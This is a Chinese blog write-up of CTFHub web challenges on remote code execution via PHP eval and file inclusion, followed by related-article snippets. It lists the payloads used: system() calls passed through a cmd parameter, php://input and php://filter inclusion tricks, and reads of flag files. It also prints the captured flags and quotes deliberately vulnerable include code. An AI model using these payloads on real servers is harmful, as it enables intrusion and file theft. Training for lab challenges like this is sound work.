CTFHUB-WEB-RCE【07】eval执行、文件包含

最新推荐文章于 2024-08-05 19:38:26 发布
最新推荐文章于 2024-08-05 19:38:26 发布
阅读量450 收藏 2
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/grb819/article/details/117790351
版权

!!!坚持

eval执行

在这里插入图片描述

查看根目录文件
?cmd=system("ls");

在这里插入图片描述

查看下一级目录
?cmd=system("ls /");

在这里插入图片描述

cat 命令读取文件
?cmd=system("cat /flag_24676");

在这里插入图片描述

文件包含

在这里插入图片描述

构造playload 传参

?file=shell.txt
在这里插入图片描述

查看当前目录下文件

ctfhub=system(“ls”);

下一级

ctfhub=system(“ls /”);
在这里插入图片描述

cat查看信息

ctfhub=system(“cat /flag”);

php://input

php://input 伪协议相当于一个削弱post的方法

在这里插入图片描述
?file=php://input

抓包消息中<?php system("ls /");?>

在这里插入图片描述

<?php system("cat /flag_26957");?>
<?php system("cat /flag_26957");?>

读取源代码

源代码提示flag的位置,并且限制使用伪协议

在这里插入图片描述

php://filter 任意文件读取
?file=php://filter/read=convert.base64-encode/resource=/flag

在这里插入图片描述

在这里插入图片描述

ctfhub{87e82d4ef0cd7ee1f4c849b1}

或者不用加密解密,直接构造也可
?file=php://filter/resource=/flag
在这里插入图片描述

远程包含

在这里插入图片描述

不知道是否可以?file=php://filter/resource=/flag 任意文件读取 nope

使用php://input 伪协议

?file=php://input

cat命令查看
<?php system("ls /");?> <?php system("cat /flag");?>

在这里插入图片描述
ctfhub{77e32053d6db1a2f60cac189}

(∪.∪ )...zzz
关注
专栏目录
CTFhub 文件包含
qq_41497476的博客
07-27 2546
这类题目很久以前接触过,也有过应用,主要的方法是利用一些伪协议完成后台信息的提取 题目源码 <?php error_reporting(0); if (isset($_GET['file'])) { if (!strpos($_GET["file"], "flag")) { include $_GET["file"]; } else { echo "Hacker!!!"; } } else { highlight_file(__FILE_
CTFHub-Web-RCE-eval执行题目解析
weixin_46168073的博客
11-15 1395
一、启动场景 点击web 点击RCE 点击eval执行。 开启题目,启动场景。注册会送1000个币,做一个题目消耗30,做完奖励100还是50,总之完全不用担心币的问题。 启动之后会出现一个链接,我们点击。 二、解题过程 这里会出现PHP代码。 我们使用蚁剑 。(安装之类的我会单独写一篇文章) 右键--->添加数据。 把URL复制到蚁剑,密码cmd 然后点击添加。 可以看到我们添加数据成功。 双击进...
CTFeval
qq_74263993的博客
04-27 737
_REQUEST变量是一个关联数组,它的键是表单元素的名称,值是用户输入的数据。通过$_REQUEST变量,可以访问表单中所有输入字段的值,不论它们是使用GET、POST还是COOKIE方法提交的。在PHP中,$_REQUEST是一个超全局变量,用于收集HTML表单提交的数据。如果代码中存在解析错误,则 eval() 函数返回 false。hello=show_source('flag.php')该字符串必须是合法的 PHP 代码,且必须以分号结尾。
ctfhub eval执行
最新发布
a666666688的博客
08-05 340
大致意思是判断用户是否传入了一个cmd,否则执行else。函数会将传入的字符串当作 PHP 代码来执行。中的数据)传递了名为。函数来执行该参数的值。
CTFHUB RCE——文件包含
winofkill的博客
12-11 6462
1.文件包含 首先我们开启题目 看到的是一大串代码 我们仔细看一下php代码,重点是 if(!strpos($_GET["file"],"flag")){ include$_GET["file"]; 这里有一个strpos(string,find,start)函数 意思在string字符串中找find的位置,start是查找的开始位置 那么这句代码的意思就是如果file中没有flag字符串就执行下面的include$_GET["file"] 否则...
CTFHUB-RCE-文件包含
u014794539的博客
07-11 431
考点 php伪协议 file协议 分析过程 Shell是这个 使用hackbar 构造Playload传参 http://challenge-deb7e7e0db233e27.sandbox.ctfhub.com:10800/shell.txt ctfhub=system('ls /'); ctfhub=system('cat /flag'); 得到flag ctfhub{3a551fa301f8dda0dccd2c7d} php://input 考点 php伪协议 input协议 分析思路
ctfhub-eval执行
m0_65766842的博客
02-28 255
CTFHUB-web-RCE
ookami6497的博客
12-03 1497
CTFHUB-WEB-RCE
K_ShenH的博客
06-16 865
CTFHUB-WEB-RCE
CTFHubRCE文件包含
cx_sam的博客
08-07 1755
CTF WEB RCE 文件包含
CTFHUB-技能树-WEB通关
Alita_lxz的博客
11-11 7239
Web 题目来自ctfhub技能树web部分 Web前置技能 操作系统 数据库 HTTP协议 请求方式 HTTP 请求方法, HTTP/1.1协议中共定义了八种方法(也叫动作)来以不同方式操作指定的资源。 ​ 1.OPTIONS   返回服务器针对特定资源所支持的HTTP请求方法。也可以利用向Web服务器发送’*'的请求来测试服务器的功能性,如获取当前URL所支持的方法。若请求成功,则它会在HTTP头中包含一个名为“Allow”的头,值是所支持的方法,如“GET,POST”。  2.HEAD   向服务
CTFHub | eval执行
尼泊罗河伯的博客
04-19 1414
eval 函数可以将字符串作为代码执行,那么在使用 eval 函数作为获取用户输入的时候应该避免使用这类函数。如果用户输入的是一段恶意代码,就会导致严重的安全问题。
CTFHub_技能树_WebRCE——“文件包含
Ho1aAs‘s Blog
07-24 2094
文章目录使用工具网页显示解答过程完 –>CTFHub传送门<– 使用工具 Microsoft Edge v84.0.522.40 Hackbar插件 网页显示 发现并没有可以注入的语句,看一下shell 找到注入点,结合$_GET,思考把shell包含进去 解答过程 将shell.txt包含进语句,执行ls /查询目录,发现flag文件,cat /flag访问 得到FLAG 完 欢迎在评论区留言 感谢浏览 ...
CTFHub技能树web(持续更新)--RCE--文件包含
jiuyongpinyin的博客
01-26 259
文件包含 打开题目: 发现这里有个shell,我们点击查看: 这里有一个一句话木马,那咱们就不客气了,使用蚁剑: 完整的url地址: http://challenge-266e489de8b2945e.sandbox.ctfhub.com:10080/?file=shell.txt 连接成功后在跟目录中找打了flag: 得到flag 注:萌新第一次写write up,不足之处还请见谅,不对之处欢迎批评指正 ...
CTFhub(eval执行,无过滤,过滤cat,过滤空格,过滤运算符)
ndjnddjxn的博客
04-02 854
未发现什么,返回上一级目录?
CTFHUB--RCE--文件包含
qq_75120258的博客
03-02 732
有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。当它与包含函数结合时,php://filter经常会被当作代码呗执行,所以我们通常会对他进行BASE64编码。file=php://filter/resource=/flag 得到flag。php:// — 访问各个输入/输出流(I/O streams)data://text/plain 任意代码执行。zlib:// — 压缩流。
cctfhub---rce-eval文件执行
x2813488062的博客
02-24 3859
eval详解 命令详解 一.eval执行 <?php if (isset($_REQUEST['cmd'])) { eval($_REQUEST["cmd"]); } else { highlight_file(__FILE__); } ?> 代码中用cmd来接收传入数据 可以将代码传递给cmd来执行 /?cmd=system("pwd") system()函数的作用为执行系统命令并输出执行结果 执行 pwd 指令可立刻得知您目前所在的工作目录...
CTF挑战:远程命令执行(RCE)与Web安全策略
"了解CTF(Capture The Flag)竞赛中关于远程命令执行RCE)的概念,以及如何在Web安全场景下利用和防范此类漏洞" 远程命令执行RCE)是一种严重的安全漏洞,它允许攻击者通过Web接口执行任意系统命令。当服务器...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值